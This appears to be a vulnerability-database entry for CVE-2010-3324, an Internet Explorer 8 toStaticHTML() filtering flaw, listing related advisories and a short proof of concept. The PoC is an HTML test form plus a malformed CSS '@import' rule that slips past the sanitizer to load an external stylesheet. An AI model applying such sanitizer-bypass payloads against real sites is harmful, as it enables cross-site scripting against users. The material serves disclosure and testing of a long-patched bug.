Microsoft IE 8 toStaticHTML()函数不安全HTML过滤漏洞(MS10-071/MS10-072)

🗓️ 14 Oct 2010 00:00:00Reported by RootType

IE 8 toStaticHTML()函数不安全HTML过滤漏洞(MS10-071/MS10-072)BUGTRAQ ID: 42467 CVE-2010-332

Reporter	Title	Published	Views	Family All 20
Circl	CVE-2010-3324	16 Aug 201000:00	–	circl
Check Point Advisories	Internet Explorer toStaticHTML API Cross-Site-Scripting (MS10-072; CVE-2010-3324)	12 Oct 201000:00	–	checkpoint_advisories
CVE	CVE-2010-3324	17 Sep 201017:46	–	cve
Cvelist	CVE-2010-3324	17 Sep 201017:46	–	cvelist
Microsoft KB	MS10-072: Vulnerabilities in Microsoft SharePoint could allow information disclosure	11 May 201222:40	–	mskb
NVD	CVE-2010-3324	17 Sep 201018:00	–	nvd
OpenVAS	Microsoft Internet Explorer Multiple Vulnerabilities (2360131)	13 Oct 201000:00	–	openvas
OpenVAS	Microsoft Internet Explorer 'toStaticHTML()' XSS Vulnerability	23 Sep 201000:00	–	openvas
OpenVAS	Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048)	22 Sep 201100:00	–	openvas
OpenVAS	Microsoft Internet Explorer Multiple Vulnerabilities (2360131)	13 Oct 201000:00	–	openvas


                                                &lt;script type=&quot;text/javascript&quot;&gt;
function fuckie()
{
var szInput = document.shit.input.value;
var szStaticHTML = toStaticHTML(szInput);

ResultComment = szStaticHTML;
document.shit.output.value = ResultComment;
}
&lt;/script&gt;

&lt;form name=&quot;shit&quot;&gt;
&lt;textarea name='input' cols=40 rows=20&gt;
&lt;/textarea&gt;
&lt;textarea name='output' cols=40 rows=20&gt;
&lt;/textarea&gt;

&lt;input type=button value=&quot;fuck_me&quot; name=&quot;fuck&quot; onclick=fuckie();&gt;
&lt;/form&gt;


&lt;style&gt;

}@import url('//127.0.0.1/1.css');aaa

{;}

&lt;/style&gt;
&lt;div id=&quot;x&quot;&gt;Fuck Ie&lt;/div&gt;

14 Oct 2010 00:00Current

6.3Medium risk

Vulners AI Score6.3

EPSS0.26442